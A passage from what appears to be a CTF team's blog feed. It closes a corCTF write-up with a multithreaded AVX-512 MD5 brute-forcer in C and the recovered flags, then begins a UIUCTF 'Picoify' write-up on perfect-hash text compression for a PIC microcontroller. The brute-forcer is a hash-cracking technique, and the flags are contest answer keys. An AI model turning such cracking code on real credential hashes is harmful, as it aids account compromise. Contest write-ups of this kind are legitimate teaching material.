_mm512_add_epi32(x0, _mm512_set1_epi32(0xf4292244))); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x432aff97)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xab9423ff)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xfc93a039)); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x655b59c3)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x8f0ccc92)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xffeff47d)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_add_epi32(x1, _mm512_set1_epi32(0x85845dd1))); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x6fa87e4f)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xfe2ce6e0)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xa3014314)); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0x4e0811a1)); AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0xf7537e82)); AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xbd3af235)); AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_add_epi32(x2, _mm512_set1_epi32(0x2ad7d2bb))); AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xeb86d391)); __mmask16 eq_c = _mm512_cmpeq_epi32_mask(c, _mm512_set1_epi32(T0)); __mmask16 eq_d = _mm512_cmpeq_epi32_mask(d, _mm512_set1_epi32(T1)); __mmask16 eq = eq_c &amp; eq_d; if (eq) { __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16]; _mm512_store_si512(_x0, x0); _mm512_store_si512(_x1, x1); _mm512_store_si512(_x2, x2); for (int i = 0; i &lt; 16; i++) if ((eq &gt;&gt; i) &amp; 1) printf("found: %.4s%.4s%.4s\n", (uint8_t *)&amp;_x0[i], (uint8_t *)&amp;_x1[i], (uint8_t *)&amp;_x2[i]); } } #define A 62 #define NTHREADS 8 const char ALPHABET[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00"; const char ALPHABET_S4[50] = "012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv"; static void *search(void *arg) { __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16]; int n = (uint64_t)arg; int start = n * (50 / NTHREADS); int end = n != NTHREADS - 1 ? (n + 1) * (50 / NTHREADS) : 50; printf("starting search [%d, %d)\n", start, end); uint8_t flag[12] = { 0 }; flag[11] = 0x80; const __m512i Y0 = _mm512_setr_epi32(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70); const __m512i Y1 = _mm512_setr_epi32(71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86); const __m512i Y2 = _mm512_setr_epi32(87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108); const __m512i Y3 = _mm512_setr_epi32(109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 48); for (int c0 = start; c0 &lt; end; c0++) { flag[9] = ALPHABET_S4[c0]; flag[0] = ALPHABET_S4[c0] + 1; flag[7] = ALPHABET_S4[c0] + 4; for (int c1 = 0; c1 &lt; A; c1++) { flag[1] = flag[10] = ALPHABET[c1]; for (int c2 = 0; c2 &lt; A; c2++) { flag[2] = flag[4] = ALPHABET[c2]; for (int c3 = 0; c3 &lt; A; c3++) { flag[3] = ALPHABET[c3]; for (int c4 = 0; c4 &lt; A; c4++) { flag[5] = ALPHABET[c4]; for (int c5 = 0; c5 &lt; A; c5++) { flag[6] = ALPHABET[c5]; uint32_t *flag_u32 = (uint32_t *)flag; for (int i = 0; i &lt; 16; i++) { _x0[i] = flag_u32[0]; _x1[i] = flag_u32[1]; _x2[i] = flag_u32[2]; } __m512i x0 = _mm512_load_si512(_x0); __m512i x1 = _mm512_load_si512(_x1); __m512i x2 = _mm512_load_si512(_x2); md5_avx512(x0, x1, _mm512_or_si512(x2, Y0)); md5_avx512(x0, x1, _mm512_or_si512(x2, Y1)); md5_avx512(x0, x1, _mm512_or_si512(x2, Y2)); md5_avx512(x0, x1, _mm512_or_si512(x2, Y3)); } } } } } printf("checkpoint: %d (thread %d)\n", c0, n); } } int main() { pthread_t threads[NTHREADS]; for (uint64_t i = 0; i &lt; NTHREADS; i++) pthread_create(&amp;threads[i], NULL, search, (void *)i); for (uint64_t i = 0; i &lt; NTHREADS; i++) pthread_join(threads[i], NULL); return 0; } 1hr 20mins later, it found the flag: corctf{cPv3v8VfWbP}. The full flag emerges when it is submitted to digestme: $ ./digestme Welcome! Please enter the flag here: corctf{cPv3v8VfWbP} Nice! Full flag: corctf{youtu.be/dQw4w9WgXcQ} Final thoughts Despite being so close to solving it in the end – and also costing us 6th place, I enjoyed every part of the challenge, from converting the disassembly into bitwise operations and then 32-bit integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I somehow messed up. I do believe the challenge would have been better off with a smaller search space, because some people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization is fun, especially when SIMD is involved.]]></summary></entry><entry><title type="html">[UIUCTF 2024] Picoify (500)</title><link href="https://maplebacon.org/2024/07/uiuctf-picoify/" rel="alternate" type="text/html" title="[UIUCTF 2024] Picoify (500)" /><published>2024-07-01T00:00:00+00:00</published><updated>2024-07-01T00:00:00+00:00</updated><id>https://maplebacon.org/2024/07/uiuctf-picoify</id><content type="html" xml:base="https://maplebacon.org/2024/07/uiuctf-picoify/"><![CDATA[<h2 id="problem-description">Problem Description</h2>

<p>Picoify is a “king-of-the-hill” style challenge in which we’re tasked with implementing a compression algorithm and corresponding decompressor under fairly severe restrictions. Better compression results in a better score.</p>

<p>Specifically, the task is to write a compression algorithm for the Microchip PIC16F628A, a small 8-bit microprocessor with 2048 <em>words</em> of program memory (i.e. space for 2048 instructions), and 224 <em>bytes</em> of RAM. The decompressor is written in Python, but is run in a strict seccomp sandbox with tight memory and CPU limits.</p>

<p>The input text is 2048 bytes long, drawn randomly from a list of 8192 uppercase words, with certain letters (ABEGIOSTZ) randomly replaced by 1337-speak equivalents (50% probability). Here’s an example input:</p>

<blockquote>
  <p>RE4LLY RUG C1TI35 633K R35P1RA7ORY GUARD COL0URS P4PER PRO7EC73D SQU4R3 C0M81NE P0RC3L41N L0 NI 7ASKS CER4MIC YO6A 7ERM1NA7I0N C0N50L3S 3F N0RT0N F1RM N3C HELP5 R1M UM 7R166ER MURPHY H3LP SENS0R EXTR4ORDINARY 5UPER M0R0CC0 B0T5WANA C0NN3C710N M3NT10N WO0D5 E4R AUTHEN71C 6OV3RNM3N74L CHRI5 S33KER LIN6ER1E PR0DUC71ON 3XPLORER F4C3 FLO0D DECAD3 AN4LYSES AV6 4GE5 4U5 P455AGE D 8R42IL14N 8RIN61N6 63OR614 TUR80 B3LG1UM CSS ARMED 0U7COM3 U5IN6 8UDDY AU7OM471ON R35ULT3D JACKET 6R CHR0NIC BESIDES L4ND M0V135 PREP4RE F15HIN6 N1CK SCH3ME ALPINE MUL7I 5UPPL3M[…]</p>
</blockquote>

<p>The input is truncated to fit 2048 bytes, so the final word may be cut off.</p>

<p>The score of any submission is the number of bytes saved, and you need to compress by at least 25% to get a flag at all. Thus, the minimum score to get a flag is 512 (2048 * 1/4).</p>

<p>We’re provided with a starter PIC assembly file that just echoes the input back to the output, as well as a Dockerfile for running the scoring system locally.</p>

<h2 id="analysis">Analysis</h2>

<p>There are only 36 unique characters, so one very simple approach is to output 6 bits per byte; this would be sufficient to score <strong>512</strong> and get a flag (output is 2048*6/8 = 1536 bytes exactly). We can get more clever using entropy encoding, using a variable number of bits per character; the Huffman algorithm is a common approach. We can use a quick script to calculate the average entropy of the texts and estimate the score of such an approach:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">collections</span> <span class="kn">import</span> <span class="n">Counter</span>
<span class="kn">import</span> <span class="nn">math</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">Counter</span><span class="p">()</span>
<span class="n">samples</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">100</span><span class="p">):</span>
    <span class="n">data</span> <span class="o">=</span> <span class="n">generate_data</span><span class="p">()</span>
    <span class="n">samples</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="n">c</span><span class="p">.</span><span class="n">update</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>

<span class="n">total</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">samples</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2048</span>
<span class="n">entropy</span> <span class="o">=</span> <span class="nb">sum</span><span class="p">((</span><span class="n">v</span> <span class="o">/</span> <span class="n">total</span><span class="p">)</span> <span class="o">*</span> <span class="o">-</span><span class="n">math</span><span class="p">.</span><span class="n">log2</span><span class="p">(</span><span class="n">v</span> <span class="o">/</span> <span class="n">total</span><span class="p">)</span> <span class="k">for</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">c</span><span class="p">.</span><span class="n">values</span><span class="p">())</span>
</code></pre></div></div>

<p>This produces an entropy of 4.67 bits per character, meaning that we should be able to score around <strong>852</strong> with a Huffman-based approach (2048*4.67/8 ≈ 1196). From the challenge scoreboard provided by the organizers, it seems most successful teams took this approach.</p>

<p>While I considered these approaches, I figured it should be possible to score much higher given the constrained nature of the input text: there are only 8192 words (13 bits of entropy <em>per word</em>), and a few bits of extra entropy per word to account for the random 1337-speak letters (1 bit of entropy per 1337-speakable letter). Running a quick simulation, if we’re able to actually encode each word using exactly 13 bits (plus 1337-speak bits), we could score an average of 1485 (average output size is 562.8 bytes):</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span><span class="p">,</span> <span class="n">statistics</span>
<span class="n">comp_bits</span> <span class="o">=</span> <span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">t</span><span class="p">.</span><span class="n">split</span><span class="p">())</span> <span class="o">*</span> <span class="mi">13</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">re</span><span class="p">.</span><span class="n">findall</span><span class="p">(</span><span class="sa">b</span><span class="s">"[ABEGIOSTZ483610572]"</span><span class="p">,</span> <span class="n">t</span><span class="p">))</span> <span class="k">for</span> <span class="n">t</span> <span class="ow">in</span> <span class="n">samples</span><span class="p">]</span>
<span class="k">print</span><span class="p">(</span><span class="n">statistics</span><span class="p">.</span><span class="n">mean</span><span class="p">(</span><span class="n">comp_bits</span><span class="p">)</span> <span class="o">/</span> <span class="mi">8</span><span class="p">)</span>
</code></pre></div></div>

<p>This sets a rough upper bound on the performance of <em>any</em> compression algorithm - it measures the amount of entropy used to generate the output in the first place.</p>

<h2 id="the-compressor">The Compressor</h2>

<p>For encoding words using a minimum number of bits, we can use <em>perfect hashing</em>. A perfect hash function is one which maps every input in a finite set to a unique numerical value with no collisions. If we can find a perfect hash function for our wordlist, we could compress by outputting the hash values for each word; as there are no collisions, the decompressor could uniquely map these back to the original words.</p>

<p>Luckily, the <a href="https://www.gnu.org/software/gperf/">GNU <code class="language-plaintext highlighter-rouge">gperf</code></a> command is designed specifically for this purpose. It is normally used to derive perfect hash functions for sets of keywords (e.g. for parsing a programming language). We can just feed <code class="language-plaintext highlighter-rouge">gperf</code> our entire wordlist: <code class="language-plaintext highlighter-rouge">head -n 8192 words.txt | tr a-z A-Z | gperf -n -m=10 -k '1-11,$' -7 &gt; gperf.c</code>.</p>

<p><code class="language-plaintext highlighter-rouge">gperf</code> outputs C code which implements the perfect hash function:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span>
<span class="n">hash</span> <span class="p">(</span><span class="n">str</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
     <span class="k">register</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">str</span><span class="p">;</span>
     <span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span><span class="p">;</span>
<span class="p">{</span>
  <span class="k">static</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">asso_values</span><span class="p">[]</span> <span class="o">=</span>
    <span class="p">{</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>    <span class="mi">145</span><span class="p">,</span>  <span class="mi">22134</span><span class="p">,</span>  <span class="mi">14665</span><span class="p">,</span>   <span class="mi">7025</span><span class="p">,</span>     <span class="mi">20</span><span class="p">,</span>
       <span class="mi">43498</span><span class="p">,</span>   <span class="mi">6070</span><span class="p">,</span>   <span class="mi">2551</span><span class="p">,</span>     <span class="mi">60</span><span class="p">,</span>  <span class="mi">13988</span><span class="p">,</span>  <span class="mi">38948</span><span class="p">,</span>   <span class="mi">1820</span><span class="p">,</span>  <span class="mi">30148</span><span class="p">,</span>     <span class="mi">15</span><span class="p">,</span>     <span class="mi">85</span><span class="p">,</span>
        <span class="mi">6351</span><span class="p">,</span>   <span class="mi">5350</span><span class="p">,</span>     <span class="mi">25</span><span class="p">,</span>      <span class="mi">5</span><span class="p">,</span>     <span class="mi">65</span><span class="p">,</span>    <span class="mi">555</span><span class="p">,</span>  <span class="mi">14565</span><span class="p">,</span>   <span class="mi">2027</span><span class="p">,</span>    <span class="mi">295</span><span class="p">,</span>    <span class="mi">735</span><span class="p">,</span>
       <span class="mi">45643</span><span class="p">,</span>  <span class="mi">29266</span><span class="p">,</span>   <span class="mi">7705</span><span class="p">,</span>  <span class="mi">42888</span><span class="p">,</span>  <span class="mi">10966</span><span class="p">,</span>     <span class="mi">21</span><span class="p">,</span>   <span class="mi">4875</span><span class="p">,</span>    <span class="mi">325</span><span class="p">,</span>   <span class="mi">4725</span><span class="p">,</span>  <span class="mi">53578</span><span class="p">,</span>
       <span class="mi">57958</span><span class="p">,</span>  <span class="mi">14261</span><span class="p">,</span>   <span class="mi">1220</span><span class="p">,</span>  <span class="mi">29394</span><span class="p">,</span>  <span class="mi">60128</span><span class="p">,</span>  <span class="mi">26679</span><span class="p">,</span>  <span class="mi">45243</span><span class="p">,</span>    <span class="mi">275</span><span class="p">,</span>   <span class="mi">2250</span><span class="p">,</span>   <span class="mi">1350</span><span class="p">,</span>
       <span class="mi">23954</span><span class="p">,</span>    <span class="mi">585</span><span class="p">,</span>    <span class="mi">430</span><span class="p">,</span>     <span class="mi">90</span><span class="p">,</span>  <span class="mi">35098</span><span class="p">,</span>  <span class="mi">11101</span><span class="p">,</span>  <span class="mi">49537</span><span class="p">,</span>    <span class="mi">401</span><span class="p">,</span>  <span class="mi">51258</span><span class="p">,</span>      <span class="mi">1</span><span class="p">,</span>
       <span class="mi">64213</span><span class="p">,</span>  <span class="mi">10636</span><span class="p">,</span>   <span class="mi">4410</span><span class="p">,</span>   <span class="mi">1945</span><span class="p">,</span>  <span class="mi">10338</span><span class="p">,</span>   <span class="mi">2786</span><span class="p">,</span>  <span class="mi">42248</span><span class="p">,</span>  <span class="mi">14110</span><span class="p">,</span>   <span class="mi">9063</span><span class="p">,</span>  <span class="mi">51277</span><span class="p">,</span>
           <span class="mi">5</span><span class="p">,</span>   <span class="mi">1385</span><span class="p">,</span>    <span class="mi">330</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span>
      <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span><span class="p">,</span> <span class="mi">206124</span>
    <span class="p">};</span>
  <span class="k">register</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">hval</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

  <span class="k">switch</span> <span class="p">(</span><span class="n">len</span><span class="p">)</span>
    <span class="p">{</span>
      <span class="nl">default:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">10</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">10</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">9</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">9</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">8</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">8</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">7</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">7</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">6</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">6</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span><span class="o">+</span><span class="mi">3</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">5</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span><span class="o">+</span><span class="mi">19</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span><span class="o">+</span><span class="mi">13</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">3</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span><span class="o">+</span><span class="mi">29</span><span class="p">];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">1</span><span class="p">]];</span>
      <span class="cm">/*FALLTHROUGH*/</span>
      <span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">hval</span> <span class="o">+=</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">+</span><span class="mi">42</span><span class="p">];</span>
        <span class="k">break</span><span class="p">;</span>
    <span class="p">}</span>
  <span class="k">return</span> <span class="n">hval</span> <span class="o">+</span> <span class="n">asso_values</span><span class="p">[(</span><span class="kt">unsigned</span> <span class="kt">char</span><span class="p">)</span><span class="n">str</span><span class="p">[</span><span class="n">len</span> <span class="o">-</span> <span class="mi">1</span><span class="p">]];</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Over our wordlist, the maximum hash value is 206123, which can be comfortably encoded in 18 bits (2<sup>18</sup> = 262144). Simulating this, we find that this should compress to around 734 bytes per message on average, giving a score of <strong>1314</strong> - far better than the Huffman approach!</p>

<p>Instead of writing this in PIC assembly, I chose to use Microchip’s XC8 C compiler. I converted the provided startup code to C in order to get the UART to work. Since we’re working with a very small amount of memory, I chose the smallest possible data types to save space, making use of Microchip’s special <code class="language-plaintext highlighter-rouge">uint24_t</code> 3-byte integer type to save even more space.</p>

<p>The implementation itself is relatively straightforward: we accumulate the hash and “1337 bits” as each plaintext character comes in, then flush the hash and any accumulated 1337 bits when we see a space character. When we reach 2028 total input characters, we switch to encoding the remaining characters directly to avoid problems with any final truncated word (as the longest word in the wordlist is 18 characters).</p>

<p>Here’s what the PIC code looks like. This is compiled with <code class="language-plaintext highlighter-rouge">xc8-cc -mcpu=pic16f628a -O2</code>:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;xc.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
</span>
<span class="c1">// disable the watchdog timer</span>
<span class="cp">#pragma config WDTE = OFF
</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">txbuf</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">txcnt</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">send_byte</span><span class="p">(</span><span class="kt">uint8_t</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">txbuf</span><span class="p">[</span><span class="n">txcnt</span><span class="p">]</span> <span class="o">=</span> <span class="n">b</span><span class="p">;</span>
    <span class="n">txcnt</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">uint16_t</span> <span class="n">total_rx_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">is_tail</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">word_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">last_char</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="n">uint24_t</span> <span class="n">cur_hash</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="n">uint24_t</span> <span class="n">leet_bits</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">static</span> <span class="kt">uint8_t</span> <span class="n">leet_count</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// compressed form of the gprof table, removing unreachable entries</span>
<span class="k">static</span> <span class="k">const</span> <span class="kt">uint16_t</span> <span class="n">asso_values</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">145</span><span class="p">,</span> <span class="mi">22134</span><span class="p">,</span> <span class="mi">14665</span><span class="p">,</span> <span class="mi">7025</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="mi">43498</span><span class="p">,</span> <span class="mi">6070</span><span class="p">,</span> <span class="mi">2551</span><span class="p">,</span> <span class="mi">60</span><span class="p">,</span> <span class="mi">13988</span><span class="p">,</span> <span class="mi">38948</span><span class="p">,</span> <span class="mi">1820</span><span class="p">,</span> <span class="mi">30148</span><span class="p">,</span> <span class="mi">15</span><span class="p">,</span> <span class="mi">85</span><span class="p">,</span> <span class="mi">6351</span><span class="p">,</span> <span class="mi">5350</span><span class="p">,</span> <span class="mi">25</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">65</span><span class="p">,</span> <span class="mi">555</span><span class="p">,</span> <span class="mi">14565</span><span class="p">,</span> <span class="mi">2027</span><span class="p">,</span> <span class="mi">295</span><span class="p">,</span> <span class="mi">735</span><span class="p">,</span> <span class="mi">45643</span><span class="p">,</span> <span class="mi">29266</span><span class="p">,</span> <span class="mi">7705</span><span class="p">,</span> <span class="mi">42888</span><span class="p">,</span> <span class="mi">10966</span><span class="p">,</span> <span class="mi">21</span><span class="p">,</span> <span class="mi">4875</span><span class="p">,</span> <span class="mi">325</span><span class="p">,</span> <span class="mi">4725</span><span class="p">,</span> <span class="mi">53578</span><span class="p">,</span> <span class="mi">57958</span><span class="p">,</span> <span class="mi">14261</span><span class="p">,</span> <span class="mi">1220</span><span class="p">,</span> <span class="mi">29394</span><span class="p">,</span> <span class="mi">60128</span><span class="p">,</span> <span class="mi">26679</span><span class="p">,</span> <span class="mi">45243</span><span class="p">,</span> <span class="mi">275</span><span class="p">,</span> <span class="mi">2250</span><span class="p">,</span> <span class="mi">1350</span><span class="p">,</span> <span class="mi">23954</span><span class="p">,</span> <span class="mi">585</span><span class="p">,</span> <span class="mi">430</span><span class="p">,</span> <span class="mi">90</span><span 